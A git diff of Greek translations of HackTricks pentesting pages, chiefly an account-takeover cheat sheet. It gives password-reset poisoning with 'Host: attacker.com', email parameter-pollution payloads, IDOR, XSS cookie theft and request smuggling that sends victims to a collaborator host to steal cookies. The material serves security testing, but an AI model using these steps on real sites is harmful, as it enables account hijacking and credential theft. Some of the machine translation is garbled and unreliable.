* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,47 +1,61 @@
|
|||
# Ευπάθειες Εγγραφής και Κατάληψης
|
||||
# Ευπάθειες Εγγραφής & Κατάληψης
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης των HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στα HackTricks** ή να **κατεβάσετε τα HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση της κατάληψης λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Κατάληψη Εγγραφής
|
||||
|
||||
### Διπλή Εγγραφή
|
||||
|
||||
* Δοκιμάστε να δημιουργήσετε έναν υπάρχοντα χρήστη
|
||||
* Δοκιμάστε να δημιουργήσετε χρησιμοποιώντας ένα υπάρχον όνομα χρήστη
|
||||
* Ελέγξτε ποικίλες μορφές του email:
|
||||
* κεφαλαία γράμματα
|
||||
* \+1@
|
||||
* προσθέστε μερικούς τελείες στο email
|
||||
* ειδικοί χαρακτήρες στο όνομα του email (%00, %09, %20)
|
||||
* Βάλτε μαύρους χαρακτήρες μετά το email: `test@test.com a`
|
||||
* victim@gmail.com@attacker.com
|
||||
* victim@attacker.com@gmail.com
|
||||
* κεφαλαία γράμματα
|
||||
* \+1@
|
||||
* προσθέστε κάποιο τελεία στο email
|
||||
* ειδικοί χαρακτήρες στο όνομα του email (%00, %09, %20)
|
||||
* Βάλτε μαύρους χαρακτήρες μετά το email: `test@test.com a`
|
||||
* victim@gmail.com@attacker.com
|
||||
* victim@attacker.com@gmail.com
|
||||
|
||||
### Αποκάλυψη Ονόματος Χρήστη
|
||||
### Απαρίθμηση Ονομάτων Χρηστών
|
||||
|
||||
Ελέγξτε αν μπορείτε να καταλάβετε πότε ένα όνομα χρήστη έχει ήδη καταχωρηθεί στην εφαρμογή.
|
||||
Ελέγξτε αν μπορείτε να καταλάβετε πότε ένα όνομα χρήστη έχει ήδη καταχωρηθεί μέσα στην εφαρμογή.
|
||||
|
||||
### Πολιτική Κωδικού Πρόσβασης
|
||||
|
||||
Δημιουργώντας έναν χρήστη ελέγξτε την πολιτική κωδικού πρόσβασης (ελέγξτε αν μπορείτε να χρησιμοποιήσετε αδύναμους κωδικούς πρόσβασης).\
|
||||
Σε αυτήν την περίπτωση μπορείτε να δοκιμάσετε να κάνετε brute force στα διαπιστευτήρια.
|
||||
Σε αυτήν την περίπτωση μπορείτε να δοκιμάσετε να κάνετε βίαιη επίθεση για διαπιστώσετε διαπιστευτήρια.
|
||||
|
||||
### Ενέσιμη SQL
|
||||
### Εισβολή SQL
|
||||
|
||||
[**Ελέγξτε αυτήν τη σελίδα**](sql-injection/#insert-statement) για να μάθετε πώς να προσπαθήσετε να καταλάβετε λογαριασμούς ή να εξάγετε πληροφορίες μέσω **ενεσίμων SQL** σε φόρμες εγγραφής.
|
||||
[**Ελέγξτε αυτήν τη σελίδα** ](sql-injection/#insert-statement)για να μάθετε πώς να προσπαθήσετε να καταλάβετε λογαριασμούς ή να εξάγετε πληροφορίες μέσω **SQL Injections** σε φόρμες εγγραφής.
|
||||
|
||||
### Κατάληψη Oauth
|
||||
### Επιθέσεις Oauth
|
||||
|
||||
{% content-ref url="oauth-to-account-takeover.md" %}
|
||||
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
|
||||
|
@ -55,14 +69,35 @@
|
|||
|
||||
### Αλλαγή Email
|
||||
|
||||
Όταν είστε εγγεγραμμένος, δοκιμάστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή επικυρώνεται σωστά ή μπορείτε να το αλλάξετε σε αυθαίρετα emails.
|
||||
Όταν εγγραφείτε δοκιμάστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή ελέγχεται σωστά ή μπορείτε να το αλλάξετε σε τυχαία emails.
|
||||
|
||||
### Περισσότεροι Έλεγχοι
|
||||
|
||||
* Ελέγξτε αν μπορείτε να χρησιμοποιήσετε **προσωρινά emails**
|
||||
* **Μακρύς** **κωδικός πρόσβασης** (>200) οδηγεί σε **DoS**
|
||||
* **Ελέγξτε τα όρια ρυθμού στη δημιουργία λογαριασμού**
|
||||
* Χρησιμοποιήστε το username@**burp\_collab**.net και αναλύστε την **ανάκληση κλήσης**
|
||||
* **Μακρύ** **κωδικός** (>200) οδηγεί σε **DoS**
|
||||
* **Ελέγξτε τα όρια ρυθμίσεων στη δημιουργία λογαριασμού**
|
||||
* Χρησιμοποιήστε username@**burp\_collab**.net και αναλύστε το **callback**
|
||||
|
||||
## **Κατάληψη Επαναφοράς Κωδικού**
|
||||
|
||||
### Διαρροή Διακριτικού Επαναφοράς Κωδικού μέσω Αναφορέα <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
|
||||
|
||||
1. Ζητήστε επαναφορά κωδικού πρόσβασης στη διεύθυνση email σας
|
||||
2. Κάντε κλικ στον σύνδεσμο επαναφοράς κωδικού
|
||||
3. Μην αλλάξετε τον κωδικό
|
||||
4. Κάντε κλικ σε οποιονδήποτε ιστότοπο τρίτων (π.χ.: Facebook, twitter)
|
||||
5. Εμποδίστε το αίτημα στον διακομιστή Burp Suite proxy
|
||||
6. Ελέγξτε αν ο κεφαλίδα αναφορέα διαρρέει το διακριτικό επαναφοράς κωδικού.
|
||||
|
||||
### Δηλητηρίαση Επαναφοράς Κωδικού <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
|
||||
|
||||
1. Εμποδίστε το αίτημα επαναφοράς κωδικού στο Burp Suite
|
||||
2. Προσθέστε ή επεξεργαστείτε τις παρακάτω κεφαλίδες στο Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
|
||||
3. Προωθήστε το αίτημα με την τροποποιημένη κεφαλίδα\
|
||||
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
|
||||
4. Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού βασισμένη στην _κεφαλίδα κεντρικού υπολογιστή_ όπως: `https://attacker.com/reset-password.php?token=TOKEN`
|
||||
|
||||
### Επαναφορά Κωδικού μέσω Παραμέτρου Email <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
|
||||
```powershell
|
||||
# parameter pollution
|
||||
email=victim@mail.com&email=hacker@mail.com
|
||||
|
@ -79,58 +114,58 @@ email=victim@mail.com,hacker@mail.com
|
|||
email=victim@mail.com%20hacker@mail.com
|
||||
email=victim@mail.com|hacker@mail.com
|
||||
```
|
||||
### IDOR στις παραμέτρους του API <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
|
||||
### IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
|
||||
|
||||
1. Ο επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στη λειτουργία **Αλλαγή κωδικού πρόσβασης**.
|
||||
2. Ξεκινήστε το Burp Suite και παρεμβάλλετε το αίτημα.
|
||||
3. Στείλτε το στην καρτέλα repeater και επεξεργαστείτε τις παραμέτρους: Αναγνωριστικό χρήστη/ηλεκτρονικό ταχυδρομείο\
|
||||
1. Ο επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στο χαρακτηριστικό **Αλλαγή κωδικού πρόσβασης**.
|
||||
2. Ξεκινήστε το Burp Suite και Εγκαταλείψτε το αίτημα
|
||||
3. Στείλτε το στο καρτέλα repeater και επεξεργαστείτε τις παραμέτρους: Αναγνωριστικό χρήστη/ηλεκτρονικό ταχυδρομείο\
|
||||
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
|
||||
|
||||
### Αδύναμο διακριτικό επαναφοράς κωδικού πρόσβασης <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
|
||||
### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
|
||||
|
||||
Το διακριτικό επαναφοράς κωδικού πρόσβασης πρέπει να δημιουργείται τυχαία και να είναι μοναδικό κάθε φορά.\
|
||||
Προσπαθήστε να καθορίσετε εάν το διακριτικό λήγει ή εάν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι παρακάτω μεταβλητές μπορεί να χρησιμοποιηθούν από τον αλγόριθμο.
|
||||
Προσπαθήστε να καθορίσετε εάν το διακριτικό λήγει ή αν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι ακόλουθες μεταβλητές μπορεί να χρησιμοποιηθούν από τον αλγόριθμο.
|
||||
|
||||
* Χρονική σήμανση
|
||||
* Αναγνωριστικό χρήστη
|
||||
* Ηλεκτρονικό ταχυδρομείο του χρήστη
|
||||
* Όνομα και επώνυμο
|
||||
* Ημερομηνία γέννησης
|
||||
* Αναγνωριστικό Χρήστη
|
||||
* Ηλεκτρονικό ταχυδρομείο του Χρήστη
|
||||
* Όνομα και Επώνυμο
|
||||
* Ημερομηνία Γέννησης
|
||||
* Κρυπτογραφία
|
||||
* Μόνο αριθμοί
|
||||
* Μικρή ακολουθία διακριτικού (χαρακτήρες μεταξύ \[A-Z,a-z,0-9])
|
||||
* Μικρή ακολουθία διακριτικού (χαρακτήρες μεταξύ \[Α-Ζ,α-ζ,0-9])
|
||||
* Επαναχρησιμοποίηση διακριτικού
|
||||
* Ημερομηνία λήξης διακριτικού
|
||||
|
||||
### Διαρροή διακριτικού επαναφοράς κωδικού πρόσβασης <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
|
||||
### Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
|
||||
|
||||
1. Ενεργοποιήστε ένα αίτημα επαναφοράς κωδικού πρόσβασης χρησιμοποιώντας το API/UI για ένα συγκεκριμένο ηλεκτρονικό ταχυδρομείο, π.χ.: test@mail.com
|
||||
2. Επιθεωρήστε την απάντηση του διακομιστή και ελέγξτε για το `resetToken`
|
||||
3. Στη συνέχεια, χρησιμοποιήστε το διακριτικό σε ένα URL όπως `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
|
||||
1. Ενεργοποιήστε ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI για ένα συγκεκριμένο ηλεκτρονικό ταχυδρομείο, π.χ.: test@mail.com
|
||||
2. Επιθεωρήστε την απάντηση του διακομιστή και ελέγξτε το `resetToken`
|
||||
3. Στη συνέχεια χρησιμοποιήστε το διακριτικό σε ένα URL όπως `https://example.com/v3/user/password/reset?resetToken=[ΤΟ_ΔΙΑΚΡΙΤΙΚΟ_ΕΠΑΝΑΦΟΡΑΣ]&email=[ΤΟ_ΗΛΕΚΤΡΟΝΙΚΟ_ΤΑΧΥΔΡΟΜΕΙΟ]`
|
||||
|
||||
### Επαναφορά κωδικού πρόσβασης μέσω σύγκρουσης ονομάτων χρηστών <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
|
||||
### Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
|
||||
|
||||
1. Εγγραφείτε στο σύστημα με ένα όνομα χρήστη που είναι πανομοιότυπο με το όνομα χρήστη του θύματος, αλλά με κενά που έχουν εισαχθεί πριν και/ή μετά από το όνομα χρήστη, π.χ.: `"admin "`
|
||||
2. Ζητήστε επαναφορά κωδικού πρόσβασης με το κακόβουλο όνομα χρήστη.
|
||||
3. Χρησιμοποιήστε το διακριτικό που στάλθηκε στο ηλεκτρονικό σας ταχυδρομείο και επαναφέρετε τον κωδικό πρόσβασης του θύματος.
|
||||
4. Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό πρόσβασης.
|
||||
1. Εγγραφείτε στο σύστημα με ένα όνομα χρήστη που είναι ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά που έχουν εισαχθεί πριν και/ή μετά από το όνομα χρήστη. π.χ.: `"admin "`
|
||||
2. Ζητήστε επαναφορά κωδικού με το κακόβουλο όνομα χρήστη.
|
||||
3. Χρησιμοποιήστε το διακριτικό που στάλθηκε στο ηλεκτρονικό σας ταχυδρομείο και επαναφέρετε τον κωδικό του θύματος.
|
||||
4. Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό.
|
||||
|
||||
Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτήν την επίθεση.\
|
||||
Δείτε: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
|
||||
|
||||
### Κατάληψη λογαριασμού μέσω Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
|
||||
### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
|
||||
|
||||
1. Βρείτε ένα XSS μέσα στην εφαρμογή ή ένα υποτομέα αν τα cookies είναι περιορισμένα στο γονικό τομέα: `*.domain.com`
|
||||
1. Βρείτε ένα XSS μέσα στην εφαρμογή ή ένα υποτομέα αν τα cookies είναι εστιασμένα στο γονικό domain: `*.domain.com`
|
||||
2. Διαρρεύστε το τρέχον **cookie συνεδρίας**
|
||||
3. Πιστοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie
|
||||
3. Ταυτοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie
|
||||
|
||||
### Κατάληψη λογαριασμού μέσω HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
|
||||
### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
|
||||
|
||||
1. Χρησιμοποιήστε το **smuggler** για να ανιχνεύσετε τον τύπο του HTTP Request Smuggling (CL, TE, CL.TE)\
|
||||
1\. Χρησιμοποιήστε το **smuggler** για να ανιχνεύσετε τον τύπο του HTTP Request Smuggling (CL, TE, CL.TE)\
|
||||
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
|
||||
2. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το `POST / HTTP/1.1` με τα παρακάτω δεδομένα:\
|
||||
`GET http://something.burpcollaborator.net HTTP/1.1 X:` με στόχο την ανακατεύθυνση των θυμάτων στο burpcollab και την κλοπή των cookies τους\
|
||||
3. Το τελικό αίτημα μπορεί να μοιάζει με το παρακάτω
|
||||
2\. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το `POST / HTTP/1.1` με τα ακόλουθα δεδομένα:\
|
||||
`GET http://something.burpcollaborator.net HTTP/1.1 X:` με στόχο την ανοικτή ανακατεύθυνση των θυμάτων στο burpcollab και την κλοπή των cookies τους\
|
||||
3\. Το τελικό αίτημα μπορεί να μοιάζει με το ακόλουθο
|
||||
```
|
||||
GET / HTTP/1.1
|
||||
Transfer-Encoding: chunked
|
||||
|
@ -142,20 +177,20 @@ Content-Length: 83
|
|||
GET http://something.burpcollaborator.net HTTP/1.1
|
||||
X: X
|
||||
```
|
||||
Αναφορές από το Hackerone που εκμεταλλεύονται αυτό το σφάλμα\
|
||||
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
|
||||
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
|
||||
### Παραβιάσεις από το Hackerone εκμεταλλευόμενες αυτό το σφάλμα\
|
||||
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
|
||||
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
|
||||
|
||||
### Κατάληψη λογαριασμού μέσω CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
|
||||
|
||||
1. Δημιουργήστε ένα φορτίο για το CSRF, π.χ. "Φόρμα HTML με αυτόματη υποβολή για αλλαγή κωδικού πρόσβασης"
|
||||
1. Δημιουργήστε ένα φορτίο για το CSRF, π.χ: "Φόρμα HTML με αυτόματη υποβολή για αλλαγή κωδικού πρόσβασης"
|
||||
2. Αποστείλετε το φορτίο
|
||||
|
||||
### Κατάληψη λογαριασμού μέσω JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
|
||||
|
||||
Το JSON Web Token μπορεί να χρησιμοποιηθεί για την πιστοποίηση ενός χρήστη.
|
||||
Το JSON Web Token μπορεί να χρησιμοποιηθεί για την ταυτοποίηση ενός χρήστη.
|
||||
|
||||
* Επεξεργαστείτε το JWT με ένα άλλο ID χρήστη / Email
|
||||
* Επεξεργαστείτε το JWT με άλλον αριθμό αναγνωριστικού χρήστη / email
|
||||
* Ελέγξτε για αδύναμη υπογραφή JWT
|
||||
|
||||
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
|
||||
|
@ -166,16 +201,30 @@ X: X
|
|||
|
||||
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark-web** που προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι να καταπολεμήσει τις καταλήψεις λογαριασμών και τις επιθέσεις ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στην** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,38 +2,52 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; Ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; Ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε την [**Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Εγγραφείτε** [**💬**](https://emojipedia.org/speech-balloon/) [**στην ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στο** [**αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Εγγραφείτε** στην [**💬**](https://emojipedia.org/speech-balloon/) **ομάδα Discord** ή στην **ομάδα τηλεγράφου** ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στο **αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Η Έκφραση Γλώσσας (EL) είναι αναπόσπαστο μέρος του JavaEE για τη γέφυρα μεταξύ του επιπέδου παρουσίασης (π.χ., ιστοσελίδες) και της λογικής της εφαρμογής (π.χ., διαχειριζόμενα αντικείμενα), δυνατών την αλληλεπίδρασή τους. Χρησιμοποιείται κυρίως σε:
|
||||
Η Έκφραση Γλώσσας (EL) είναι ουσιώδης στο JavaEE για τη γέφυρα μεταξύ του επιπέδου παρουσίασης (π.χ., ιστοσελίδες) και της λογικής εφαρμογής (π.χ., διαχειριζόμενα αντικείμενα), επιτρέποντας την αλληλεπίδρασή τους. Χρησιμοποιείται κυρίως σε:
|
||||
|
||||
